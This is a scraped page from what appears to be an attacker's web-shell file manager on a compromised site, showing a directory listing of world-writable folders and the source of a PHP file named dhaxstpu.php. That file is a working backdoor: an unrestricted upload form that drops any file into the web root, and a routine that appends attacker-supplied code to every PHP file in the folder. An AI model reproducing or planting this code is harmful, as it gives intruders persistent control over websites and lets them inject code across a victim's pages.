Submit
Path:
~
/
home
/
ampckwxt
/
public_html
/
directjablay123.click
/
File Content:
dhaxstpu.php
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>
Submit
FILE
FOLDER
Name
Size
Permission
Action
.well-known
---
0777
195499
---
0777
487876
---
0777
735250
---
0777
abfxcnv
---
0777
cgi-bin
---
0777
hmkwxif
---
0777
ljqrzbn
---
0777
nhcdx1z
---
0777
dhaxstpu.php
760 bytes
0644
N4ST4R_ID | Naxtarrr